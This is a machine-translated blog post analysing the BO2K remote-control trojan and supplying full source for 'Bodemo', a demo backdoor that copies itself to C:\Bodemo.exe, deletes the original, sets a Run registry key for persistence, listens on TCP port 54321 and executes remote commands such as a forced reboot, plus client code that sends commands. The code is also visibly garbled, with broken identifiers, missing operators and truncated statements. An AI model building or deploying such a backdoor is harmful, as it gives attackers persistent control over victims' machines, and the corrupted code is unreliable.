BO2K Source Analysis (2) ---- Command Cycle Mechanism

zhaozj2021-02-08  207

The BO2K server command loop mechanism provides the principle of the implementation of the BO2K server Trojan horse, that is, build its own copy version, starting the copy version with its own full path, and ends. The original program is first deleted when the copy is running (deleted according to the passing parameters). Then check the registry, if you have not registered, the registration copy program is started from the system starts. Trojan horse process is completed. After that, then initialize the command array, establish the listening port, and enter the command loop. (These are the work of the entrypoint () function). This issue is again a command cycle mechanism. Note 1: This issue of Bodemo has a complete Trojan horse implementation, as well as a complete command cycle. However, only two commands, 0 commands, and 1 commands are made. But I think it is enough for the demonstration command loop. The No. 0 command will cause the server-side machine to restart (already a hacular prototype), and the No. 1 command will play a MessageBox in the server-side machine. Note 2: About BODEMO compilation, any Windows C compiler can easily compile, no need to set, but pay attention to the link library WSOCK32.LIB. If you create a pure empty Win32 app with VC, you can paste the following. If you use LCC, the compile results are only 10K size. Note 3: This Bodemo removes the error check code, so it is a big difference from the practical difference. Take it out for use only, I hope that Zhu Jun has developed the foundation to develop China Software. If there is any problem, mail to: saiwai76@263.net

The entry topic, the entrypoint () execution process is as follows: 1 Initialize the command array (Command_Handler_Table), that is, allocated a memory storage command, the default, up to 1024 commands, the initialization command is NULL. The structure of each command is this: command ID number, a function pointer, several parameters. Therefore, BO is generally the execution of the listening port, receives the client packet, extracts the command ID and parameters from the packet, and performs the function of the command pointer according to the id to the command array, and return the result information to the customer . This is basically like this. However, UDP and TCP are also supported in the actual BO2K, and packet encryption is supported. Therefore, it is much more complicated than this process. I will talk about it in the principle of the BO network in the next period. 2 Register Command (RegisterNativeCommands ()), this step is established to listen to the socket, the registration command function to the command array. Bodemo only registers two command functions, only demonstrates. Interesteders can write some command functions themselves. 3 Enter the command loop (), this step listening to the customer control command, assigns the command. In Bodemo, if 0, the No. 0 command (restart) is performed, if 1, execute the No. 1 command (empty messagebox ()). Please note that this code is dynamically adjusted in progress, this and MFC's cwinthread :: run () has a wonderful work.

You can send a command to the Bodemo in the client. SOCKET ss; ss = socket (AF_INET, SOCK_STREAM, 0); struct sockaddr_in sa; memset (& sa, 0, sizeof (struct sockaddr_in)); sa.sin_family = AF_INET; sa.sin_port = htons (54321); sa.sin_addr. S_un.s_addr = inet_addr ("xxx.xxx.xxx.xxx"); / * Server's ip address * / int RET = Connect (SS, (const struct socmeddr *) & sa, sizeof (struct socddr_in); if (socket_error = = RET) {CloseSocket (SS); return;} int boxacket [10]; bopacket [0] = 1; / * Command ID, 0 OR 1. * / send (SS, (char *) Bopacket, Sizeof (int) * 10, MSG_OOB; attached to the Bodemo Source: // #include #include

/ *********************************************************** ** / BOOL G_BISWINNT; / ********************************************************* ******** / void GetOSVersion (void); int InitializeCommandDispatcher (void); void InitializeCommands (void); void TerminateCommands (void); int KillCommandDispatcher (void); void CommandHandlerLoop (void);

DWORD WINAPI Entrypoint (LPVOID LPPARETER) {InitializationCommanddispatcher (); // Alloc Memory for Command_Handler_Table and // Command_Description_table // Initialize Them As Null

// Initialize Commands InitializationCommads ();

// do primary command (); // kill plugins terminateCommands ();

// Kill Command Dispatcher // delete command_table memory killcommanddispatcher ();

Return 0;}

Int apientry Winmain (Hinstance Hinstance, Hinstance Hprevinstance, LPSTR LPCMDLINE, INT NCMDSHOW) {getosversion ();

INT NINSTALL = 0; char * svrunregkey; svrunregkey = "software // microsoft // windows // currentversion //r"; // check for file to delete // When running BO2K, BO will use its own full path name The BO copy version of the BO copy version of the BO copy version is deleted according to this parameter. // This code has only one operational opportunity. Char * svcmdline = getcommandline (); while (svcmdline [0]! = '/ 0') {svcmdline ; if (* (svcmdline-1)) == ') Break;} if (svcmdline [0]! = '/ 0') // Find the file to be deleted, delete {while (deletefile (svcmdline) == 0) {if (getLastError () == error_file_not_found) Break; Sleep (100);}} // Get Current Module Location Char svfilename [512]; char svtargetname [max_path]; getModuleFileName (GetModuleHandle (NULL), SVFileName, 512); LSTRCPY (SVTARGETNAME, "C: //BodeMo.exe"); // ----- 1: Check for installation ----- if (sptargetname)! = 0xfffffffff) Ninstall = 1; // if (ninstall == 0) // has not installed BO ..., only in the first run BO This situation occurs {// make copy of file while (copyfile (svfilename, svtargetname, false == 0) Sleep (1000); // set startup key // Since the BO is registered as system startup. HKEY key; if (g_bIsWinNT) {if (RegOpenKey (HKEY_CURRENT_USER, svRunRegKey, & key) == ERROR_SUCCESS) {RegSetValueEx (key, "Bodemo", 0, REG_SZ, (BYTE *) svTargetName, lstrlen (svTargetName)); RegCloseKey (key );}} else {if (RegOpenKey (HKEY_LOCAL_MACHINE, svRunRegKey, & key) == ERROR_SUCCESS) {RegSetValueEx (key, "Bodemo", 0, REG_SZ, (BYTE *) svTargetName, lstrlen (svTargetName)); RegCloseKey (key); }

// and now Run THE COPY, / / ​​Note, starting the BO copy version of Startupinfo Si with its own full path Name; process_information pi; char svcomline [2048]; lstrcpyn (svcomline, svtargetname, 2048); lstrcpyn (svcomline lstrlen) svcomline, "" "" "" "" "LSTRCPYN (svcomline lstrlen (svcomline), svfilename, 2048-lstrlen (svcomline)); MEMSET (& Si, 0, SIZEOF (STARTUPInfo); Si.cb = Sizeof (Startupinfo); si.dwflags = startf_forceofffeedback; CreateProcess (Null, svcomline, null, null, 0, 0, null, null, & si, & pi);} ELSE // installed BO ..., in addition to the first run bo In addition, this is this situation. {// Enable permissions on Windows NT if (g_bIsWinNT) {HANDLE tok; // adjust permission or no permission to restart the machine if (OpenProcessToken (GetCurrentProcess (), TOKEN_ADJUST_PRIVILEGES, & tok)) {LUID luid; TOKEN_PRIVILEGES tp; LookupPrivilegeValue (NULL , SE_SHUTDOWN_NAME, & luid); tp.PrivilegeCount = 1; tp.Privileges [0] .Attributes = SE_PRIVILEGE_ENABLED; tp.Privileges [0] .Luid = luid; AdjustTokenPrivileges (tok, FALSE, & tp, NULL, NULL, NULL); LookupPrivilegeValue (NULL, SE_SECURITY_NAME, & luid); tp.PrivilegeCount = 1; tp.Privileges [0] .Attributes = SE_PRIVILEGE_ENABLED; tp.Privileges [0] .Luid = luid; AdjustTokenPrivileges (tok, FALSE, & tp, NULL, NULL, NULL) CloseHandle (TOK);}}} // Enter the command loop ENTRYPOINT (GetModuleHandle (NULL));} Return 0;}

// DETERMINE OPERATING SYSTEM VERSIONVOID GETOSVERSION (VOID) {OsversionInfo Osvi;

Osvi.dwosveionsInfosize = sizeof (OsversionInfo); if (getversionEx (& OSVI) == false) {MessageBox (hwnd_desktop, "unable to get version info", "getosversion ()", MB_OK);}

if (osvi.dwPlatformId == VER_PLATFORM_WIN32s) {MessageBox (HWND_DESKTOP, "This application does not run under WIN32s!", "Error", MB_OK);} if (osvi.dwPlatformId == VER_PLATFORM_WIN32_NT) g_bIsWinNT = 1; else g_bIsWinNT = 0 } / ************ Bo command process ***** / / This period focus is #define max_bo_commands 1024typedef int (* bo_cmd_handler) (Socket S, int COMID, DWORD NARG1, CHAR * svarg2, char * svarg3); typedef struct {bool b buttonComm; char * svfoldername; char * svcommname; char * svargdesc1; char * svargdesc2; char * svargdesc3;} BO_CMD_DESC;

BO_CMD_HANDAL * COMMAND_HANDLER_TABLE = NULL; BO_CMD_DESC * COMMAND_DESCRIPTION_TABLE = NULL;

Handle g_hdispatchmutex = null; int initializecommanddispatcher (void) {INT i;

command_handler_table = (BO_CMD_HANDLER *) malloc (sizeof (BO_CMD_HANDLER) * MAX_BO_COMMANDS); if (command_handler_table == NULL) return -1; command_description_table = (BO_CMD_DESC *) malloc (sizeof (BO_CMD_DESC) * MAX_BO_COMMANDS); if (command_description_table == NULL) Return -1; for (i = 0; i

Return 0;} // static dword WinAPI Mbthread (LPVOID PARM) {char * svtext = (char *) PARM; char * svmsg, * svtitle;

SVMSG = SVText; svtitle = svtext lstrlen (svmsg) 1;

MessageBox (GetDeskTopWindow (), SVMSG, SVTILE, MB_OK | MB_SETFOREGROUND | MB_SYSTEMMODAL); Free (PARM);

Return 0;} int CmdProc_sysMessageBox (socket S, int Comid, dword Narg1, char * svarg2, char * svarg3) {char * ptr; int msglen; DWORD TID

Msglen = lstrlen (svarg3) 2; ptr = (char *) malloc (msglen); lstrcpy (ptr, svarg3); lstrcpy (ptr lstrlen (svarg3) 1, svarg2); CreateThread (null, 0, Mbthread, PTR, 0, & TID);

return 0;} int CmdProc_SysReboot (SOCKET s, int comid, DWORD nArg1, char * svArg2, char * svArg3) {BOOL bRet; bRet = ExitWindowsEx (EWX_FORCE | EWX_REBOOT, 0); return 0;} void RegisterNativeCommands () {// RegisterNativeCommand (BO_SYSREBOOT, CmdProc_SysReboot); // RegisterNativeCommand (BO_SYSLOGKEYS, CmdProc_SysLogKeys); INT command = 0; command_handler_table [command] = CmdProc_SysReboot; command_description_table [command] .svCommName = ""; command_description_table [command] .svFolderName = ""; command_description_table [ command] .svArgDesc1 = ""; command_description_table [command] .svArgDesc2 = ""; command_description_table [command] .svArgDesc3 = ""; command_description_table [command] .bNativeComm = TRUE; // command ; command_handler_table [command] = CmdProc_SysMessageBox; command_description_table [ command] .svCommName = ""; command_description_table [command] .svFolderName = ""; command_description_table [command] .svArgDesc1 = ""; command_description_table [command] .svArgDesc2 = "Bodemo"; command_description_table [command] .svArgDe sc3 = "You are controlled by me"; command_description_table [command] .bNativeComm = TRUE;} // SOCKET s; void InitializeCommands (void) {WSADATA wsaData;! if (WSAStartup (MAKEWORD (1,1), & wsaData) = 0 ) return; // Register Native BO Commands RegisterNativeCommands (); struct sockaddr_in sa; memset (& sa, 0, sizeof (struct sockaddr_in)) ;; sa.sin_family = AF_INET; sa.sin_port = htons (54321); sa.sin_addr. S_un.s_addr = INADDR_Addr_Addr_And ((S = Socket (AF_INET, SOCK_STREAM, 0)) <0) Return; IF (Bind (Const struct sockaddr *) & sa, sizeof (struct sockaddr_in)) <0) {CloseSocket (s);

/ * bind address to socket * /} listen (s, 3);} int 4Command (int Commod, socket s, int Comid, int NARG1, Char * svarg2, char * svarg3); void commandHandlerLoop (void) {bool bidle = False; Struct Sockaddr Sa; Memset (& SA, 0, SIZEOF (Struct SockAddr)); int Len = sizeof (struct sockaddr); int Command, comid, narg1; char * svarg2, * svarg3; char * boxacket; while (1) {if {SetPriorityClass (GetCurrentProcess (), IDLE_PRIORITY_CLASS) (bIdle!); SetThreadPriority (GetCurrentThread (), THREAD_PRIORITY_IDLE); bIdle = TRUE;} SOCKET acc = accept (s, & sa, & len); if (acc == INVALID_SOCKET) continue ; if (bIdle) {SetPriorityClass (GetCurrentProcess (), NORMAL_PRIORITY_CLASS); SetThreadPriority (GetCurrentThread (), THREAD_PRIORITY_NORMAL); bIdle = FALSE; unsigned long ll; ioctlsocket (acc, FIONREAD, & ll); if (ll> 0) {boPacket = (char *) Malloc (LL 1); Recv (ACC, Bopacket, LL, MSG_PEEK); INT * P = (int *) Bopacket; Command = P [0]; comid = 0; Narg1 = 0; svarg2 = " "; Svarg3 =" "; DispatchCommand (Command) , ACC, COMID, NARG1, SVARG2, SVARG3); Free (Bopacket); ClosSocket (ACC);} Else CloseSocket (ACC);} Sleep (20);}} void TerminateCommands (void) {CloseSocket (s); WSACLANUP }

转载请注明原文地址:https://www.9cbs.com/read-2497.html

New Post(0)